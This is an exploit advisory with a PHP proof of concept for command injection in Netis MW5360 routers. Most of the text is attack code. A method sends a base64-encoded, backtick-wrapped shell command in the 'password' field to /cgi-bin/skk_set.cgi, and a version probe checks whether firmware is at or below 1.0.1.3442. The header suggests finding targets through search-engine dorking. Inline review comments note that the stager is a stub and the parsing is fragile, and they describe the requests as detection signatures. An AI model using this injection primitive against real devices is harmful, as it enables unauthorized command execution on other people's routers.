Headline
Netis MW5360 Code Injection
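Netis MW5360 suffers from a PHP code injection vulnerability. Note that PHP is the language of the proof of concept below; the value it injects is a backtick-wrapped shell command, base64-encoded into the `password` field of a POST to `/cgi-bin/skk_set.cgi`. The proof of concept's own check treats MW5360 firmware up to and including 1.0.1.3442 as affected.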
=============================================================================================================================================
| # Title : Netis MW5360 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.netis-systems.com/products/MW5360.html |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] uses the CURL to Allow remote command .
[+] Line 67 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php 
[+] PayLoad :
<?php
/**
 * Proof-of-concept client for the Netis MW5360 injection named in the header above.
 *
 * What the listing shows:
 *  - check() posts to /cgi-bin/skk_get.cgi and parses a "version" field out of the reply.
 *  - executeCommand() posts to /cgi-bin/skk_set.cgi with the command, wrapped in
 *    backticks and base64-encoded, in the "password" form field.
 *  - exploit() only reaches executeCmdStager(), which is a stub that prints its options.
 *
 * NOTE(review): as listed, the only network traffic the usage lines at the bottom
 * generate is the version probe made by check(); the stager and cleanup helpers are
 * placeholders.
 *
 * Defensive reading: the request shapes documented on executeCommand() and check()
 * are what to look for in web/management-interface logs. The affected-version
 * boundary used by check() (<= 1.0.1.3442) is the author's; confirm fixed firmware
 * versions with the vendor.
 */
class NetisRouterExploit {
    // Path prefix placed between the host and the CGI path (defaults to '/').
    private $targetUri;
    // Value forwarded as the 'delay' option to executeCmdStager(); not used elsewhere.
    private $cmdDelay;

    /**
     * @param string $targetUri Base path prepended to every CGI path.
     * @param int    $cmdDelay  Passed through to the (stubbed) command stager.
     */
    public function __construct($targetUri = '/', $cmdDelay = 30) {
        $this->targetUri = $targetUri;
        $this->cmdDelay = $cmdDelay;
    }

    /**
     * Send one command to the device through the "password" form field.
     *
     * Request shape (usable as a detection signature):
     *   POST <base>/cgi-bin/skk_set.cgi
     *   app=wan_set_shortcut, quick_set=ap,
     *   password=<base64 of a string that starts and ends with a backtick>
     *
     * NOTE(review): presumably the device base64-decodes the field and hands it to a
     * shell, where the backticks trigger command substitution. That server-side
     * behaviour is not shown in this listing.
     *
     * @param string $cmd Command text to embed.
     */
    public function executeCommand($cmd) {
        // Clean up payload file if command includes chmod
        // (the text after the first '+x' is taken as the file name; the helper only prints it)
        if (strpos($cmd, 'chmod +x') !== false) {
            $this->registerFilesForCleanup(trim(explode('+x', $cmd)[1]));
        }
        // Skip command removal for payload cleanup
        // (any command containing 'rm -f' is dropped: no request is sent for it)
        if (strpos($cmd, 'rm -f') === false) {
            // Backticks inside a double-quoted PHP string are literal characters;
            // nothing is executed locally here.
            $payload = base64_encode("`$cmd`");
            echo "Executing $cmd\n";
            // The response is ignored; the call is fire-and-forget.
            $this->sendRequest('/cgi-bin/skk_set.cgi', [
                'password' => $payload,
                'quick_set' => 'ap',
                'app' => 'wan_set_shortcut'
            ]);
        }
    }

    /**
     * Probe the device's reported model and firmware version.
     *
     * Request shape: POST <base>/cgi-bin/skk_get.cgi with mode_name=skk_get, wl_link=0.
     *
     * @return string "Unknown: ..." when there is no usable reply, "Appears: Version ..."
     *                when the model is MW5360 and the version is <= 1.0.1.3442,
     *                otherwise "Safe: Version ..." or "Safe".
     */
    public function check() {
        echo "Checking if target can be exploited.\n";
        $res = $this->sendRequest('/cgi-bin/skk_get.cgi', [
            'mode_name' => 'skk_get',
            'wl_link' => 0
        ]);
        if ($res === false || strpos($res['body'], 'version') === false) {
            return "Unknown: No valid response received from target.";
        }
        // Group 2 captures everything after "version ... :" up to the next comma.
        preg_match('/.?(version).?\s*:\s*.?((\\|[^,])*)/', $res['body'], $matches);
        if (isset($matches[2])) {
            // The captured value is split on '-V': the piece before it is treated as
            // the model, the piece after it as the version number.
            // NOTE(review): if the value contains no '-V', index [1] does not exist.
            $version_number = strtoupper(trim(explode('-V', $matches[2])[1]));
            $model_number = strtoupper(trim(explode('-V', $matches[2])[0]));
            // Keep the text after the first '-' when there is one, else after the first '('.
            if (strpos($model_number, '-') !== false) {
                $model_number = trim(explode('-', $model_number)[1]);
            } else {
                $model_number = trim(explode('(', $model_number)[1]);
            }
            // Affected-version boundary as asserted by the PoC author.
            if ($model_number == 'MW5360' && version_compare($version_number, '1.0.1.3442', '<=')) {
                return "Appears: Version " . $matches[2];
            }
            return "Safe: Version " . $matches[2];
        }
        return "Safe";
    }

    /**
     * Entry point named "exploit"; in this listing it prints a message and calls the
     * executeCmdStager() stub with 'noconcat' => true and the configured delay.
     */
    public function exploit() {
        echo "Executing exploit with payload.\n";
        $this->executeCmdStager(['noconcat' => true, 'delay' => $this->cmdDelay]);
    }

    /**
     * POST a form-encoded body to the device over plain HTTP.
     *
     * NOTE(review): the header notes mention cURL, but this uses file_get_contents()
     * with an HTTP stream context. The host is the literal placeholder "target_ip".
     * With the default '/' base path the URL contains a double slash before "cgi-bin".
     *
     * @param string $uri      CGI path appended after the base path.
     * @param array  $postData Form fields, encoded with http_build_query().
     * @return array|false ['body' => string] on success, false when the request fails.
     */
    private function sendRequest($uri, $postData) {
        $url = "http://target_ip" . $this->targetUri . $uri; // Replace 'target_ip' with actual target IP
        $options = [
            'http' => [
                'header' => "Content-type: application/x-www-form-urlencoded\r\n",
                'method' => 'POST',
                'content' => http_build_query($postData),
            ],
        ];
        $context = stream_context_create($options);
        $result = file_get_contents($url, false, $context);
        if ($result === FALSE) {
            return false;
        }
        return ['body' => $result];
    }

    /**
     * Placeholder: prints the file name and does nothing else.
     *
     * @param string $filename Name extracted by executeCommand().
     */
    private function registerFilesForCleanup($filename) {
        echo "Registering $filename for cleanup.\n";
        // Logic to clean up the file after execution.
    }

    /**
     * Placeholder: prints the options array and does nothing else.
     *
     * @param array $options Options passed by exploit().
     */
    private function executeCmdStager($options) {
        echo "Executing command stager with options: " . print_r($options, true) . "\n";
        // Implement the command stager logic here
    }
}
// Usage
// check() returns its verdict as a string; these lines do not print it.
$exploit = new NetisRouterExploit('/');
$exploit->check();
$exploit->exploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================